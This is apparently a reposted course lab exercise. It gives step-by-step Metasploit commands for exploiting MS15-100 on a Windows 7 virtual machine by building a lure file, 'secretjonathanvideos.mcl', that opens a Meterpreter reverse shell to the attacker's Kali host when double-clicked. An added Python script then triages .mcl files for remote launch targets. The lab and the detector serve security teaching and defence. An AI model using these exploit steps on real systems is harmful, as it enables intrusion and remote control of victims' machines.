Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Windows 7 File Exploit

ACTIVITY: WINDOWS 7 FILE EXPLOIT

This activity is ungraded.

  • Note: This will only work on a Windows 7 target machine. It will not work on Windows 10.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

  • Metasploit
  • Meterpreter

Downloads

You’ll need a Windows 7 system. It can be your host machine or another device altogether. If neither of those options is possible, you can download a free legal Windows 7 VM. In your hypervisor, you might need to add the Network Adapter before starting the VM.

Time: This activity should take you approximately 30 minutes to complete.

Goal
  • To prepare a malicious file that will create a remote session on a Windows 7 machine when double clicked.

Instructions

Note: Hit Enter after each command.

Before you begin: Make sure that the Windows 7 VM is running in bridged mode (in a separate VMware Hypervisor instance), and is on the same subnet as the Kali box. Turn off the Firewall on the Windows 7 system, and make sure the Windows 7 system and the Kali box can ping each other.

  1. Inside of msfconsole, execute the following commands. Make sure you read all output:
  • search ms15_100
  • use exploit/windows/fileformat/ms15_100_mcl_exe
  • info
  • set filename secretjonathanvideos.mcl
  • set file_name secretjonathanvideos.exe
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [IP ADDRESS OF YOUR KALI BOX]
  • set lport 7777
  • exploit
  2. Notice the output, which indicates the location where this file was created, for example /root/.msf4/local/secretjonathanvideos.mcl.
  3. In addition to the file created, a handler was started on the Kali box that will wait for a callback from the target Windows 7 machine when the file is double clicked.
  4. Open up another terminal and enter cp /root/.msf4/local/secretjonathanvideos.mcl /root/Desktop. This will copy the file to your Kali desktop.
  5. Using Guest Additions, email, or a USB drive, copy that file over to your Windows 7 machine.
  6. Double click the file in the Windows host machine, and click View Now in the security warning.
  7. In Kali, you will see a notification that a Meterpreter session has been established.
  8. Enter sessions -l to see the sessions listed.
  9. Enter sessions -i [number of the session showing in the ID column]. For example: sessions -i 1
  10. Enjoy your Meterpreter shell! If you're using the free Microsoft Windows 7 VM (which is limited), some Meterpreter commands that I did in the Demo Videos will not work. If you're using your own Windows 7 copy, feel free to replicate everything I did in the demo videos! :-)
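
For the defending side of this lab, the following added example (not part of the course material) triages .mcl files before anyone opens them. It assumes a Media Center link file is XML whose application element can name a program in a run attribute, and that a remote (UNC or URL) target is the suspicious case; the function name, severity labels and sample files are hypothetical.

```python
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Prefixes meaning the program is fetched from another machine (UNC or URL).
REMOTE = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.I)
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".pif")

def triage_mcl(text):
    """Return (severity, reason) findings for the text of one .mcl file."""
    # Do not parse DTDs from untrusted files (entity-expansion risk).
    if re.search(r"<!\s*(DOCTYPE|ENTITY)", text, re.I):
        return [("review", "DTD or entity declaration present, not parsed")]
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [("review", f"not well-formed XML: {exc}")]
    findings = []
    for elem in root.iter():
        # Assumption: the launcher is <application run="...">; names are
        # matched case-insensitively to stay conservative.
        if elem.tag.lower() != "application":
            continue
        attrs = {k.lower(): v.strip() for k, v in elem.attrib.items()}
        target = attrs.get("run", "")
        if REMOTE.match(target):
            findings.append(("high", f"run= starts a remote program: {target}"))
        elif target.lower().endswith(EXEC_EXT):
            findings.append(("medium", f"run= starts a local program: {target}"))
        elif target:
            findings.append(("low", f"run= present: {target}"))
    return findings

# Constructed samples (documentation address range, made-up names).
SAMPLES = {
    "remote.mcl": r'<application run="\\192.0.2.10\share\viewer.exe" />',
    "local.mcl": r'<application name="Tool" run="C:\Tools\viewer.exe" />',
    "link.mcl": '<application name="Example" url="https://media.example/app" />',
    "broken.mcl": "<application run=",
}

if __name__ == "__main__":
    # Triage files named on the command line, or the samples if none are given.
    docs = {p: Path(p).read_text(encoding="utf-8", errors="replace")
            for p in sys.argv[1:]}
    for name, text in (docs or SAMPLES).items():
        for severity, reason in triage_mcl(text) or [("ok", "no run= attribute")]:
            print(f"{name}: {severity}: {reason}")
```

Run it over mail attachments or download folders; a "high" finding on a file that arrived from outside is worth quarantining before a user reaches the View Now prompt described in the steps above.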

After you've finished, complete the activities below. Please be as brief as you can in your responses (five words or less).

Reposted from: https://www.cnblogs.com/sec875/articles/10028589.html
